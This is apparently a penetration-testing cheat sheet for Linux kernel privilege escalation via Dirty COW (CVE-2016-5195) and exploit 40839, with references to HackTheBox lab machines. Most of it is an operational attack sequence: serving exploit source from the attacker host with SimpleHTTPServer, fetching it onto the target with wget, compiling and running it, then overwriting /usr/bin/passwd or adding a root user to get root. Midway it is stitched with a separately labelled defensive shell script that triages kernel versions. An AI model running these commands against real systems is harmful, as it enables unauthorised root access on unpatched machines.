4 Kernel Exploits

Family Versions

CVE-2016-5195

Effective but Unsafe

Works on old kernels (e.g. 2011/2012). Kernel: 3.2.0

Ubuntu 12.04 (2012-2014)

Version

uname -a       ..2011/2012 Kernel should be vuln to Dirty Cow
uname -a       ..debian 2.6.32  - Vulnerable
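For patch triage, the same version reasoning can be scripted. This is an added example, not part of the original notes: the function names are hypothetical, and it assumes only the upstream facts that the bug dates from 2.6.22 and was fixed in 4.4.26, 4.7.9 and 4.8.3. Other longterm branches and distro kernels backport the fix without changing the base version, so `in-range` means "confirm against the vendor advisory", not "vulnerable".

```shell
#!/bin/sh
# Added example: classify a kernel release string against the upstream
# CVE-2016-5195 version range. Function names are hypothetical.
# Assumption: upstream stable fix points only (4.4.26, 4.7.9, 4.8.3).

# ver_num X.Y[.Z]: print a sortable integer (missing fields count as 0).
ver_num() { printf '%s\n' "$1" | awk -F. '{ print $1 * 1000000 + $2 * 1000 + $3 }'; }

# ver_lt A B: succeed when version A sorts strictly before version B.
ver_lt() { [ "$(ver_num "$1")" -lt "$(ver_num "$2")" ]; }

# dirtycow_status RELEASE: print in-range, fixed-upstream, predates-bug or unparsed.
dirtycow_status() {
  # Keep the leading numeric part: "3.2.0-23-generic" -> "3.2.0"
  v=$(printf '%s\n' "$1" | sed -n 's/^\([0-9][0-9]*\(\.[0-9][0-9]*\)\{1,2\}\).*/\1/p')
  [ -n "$v" ] || { echo unparsed; return; }
  if ver_lt "$v" 2.6.22; then echo predates-bug; return; fi
  case "$v" in
    # Stable branches with their own fix release.
    4.4|4.4.*) ver_lt "$v" 4.4.26 && echo in-range || echo fixed-upstream ;;
    4.7|4.7.*) ver_lt "$v" 4.7.9  && echo in-range || echo fixed-upstream ;;
    # Everything else is compared against the mainline fix.
    *)         ver_lt "$v" 4.8.3  && echo in-range || echo fixed-upstream ;;
  esac
}

# Constructed sample release strings, followed by the running kernel.
for r in 2.6.32-5-686 3.2.0-23-generic 4.4.0-31-generic 4.4.26 4.9.0 "$(uname -r)"; do
  printf '%-22s %s\n' "$r" "$(dirtycow_status "$r")"
done
```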

Linux Versions

Linux-Exploit-Suggester-2

---------------
https://github.com/jondonas/linux-exploit-suggester-2
python -m SimpleHTTPServer 5555
wget http://$IP:5555/linux-exploit-suggester-2.pl

---------------
linux-exploit-suggester-2.pl -k 2.6.32          ..local
./linux-exploit-suggester-2.pl                  ..remote exe

Dirty Cow

  • Dirty COW is a privilege escalation vulnerability caused by a race condition in the way the Linux kernel’s memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings.

  • Download > Scroll to Bottom > Pick most recent Release (ex: Firefart)

  • REF: beepHTB, valentineHTB, lameHTB

dirty.c
https://github.com/FireFart/dirtycow/blob/master/dirty.c
git clone https://gist.github.com/e9d4ff65d703a9084e85fa9df083c679.git
python -m SimpleHTTPServer 4444
wget http://10.10.14.6:4444/dirty.c

gcc -pthread dirty.c -o dirty -lcrypt
chmod 777 dirty
./dirty        ..backs up password to /tmp
newpassword
su firefart  ..root privs!

Dirty c0w - older?

--------------------------------
uname -a                                       ..debian 2.6.32
searchsploit linux kernel 2.6.32 priv esc      ..some
searchsploit linux kernel 2.6 debian priv esc  ..nada
linux-exploit-suggester-2.pl -k 2.6.32         ..'dirty cow'

cat c0w.c                                      ..download/view
gcc -pthread c0w.c -o c0w                      ..compile
./c0w                                          ..exploit
privesc: /usr/bin/passwd                       ..result
whoami                                         ..root
cp /tmp/bak /usr/bin/passwd                    ..cleanup!

40839

uname -a                                     ..linux 2.6.24
searchsploit linux kernel 2.6.24 priv esc    ..search

searchsploit -m 40839.c                      ..copy
python -m SimpleHTTPServer 4444              ..transfer
wget http://$MyIP:4444/40839.c               ..get
gcc -pthread 40839.c -o 40839 -lcrypt        ..compile
./40839  (password)                          ..execute/set pw
su -                                         ..win
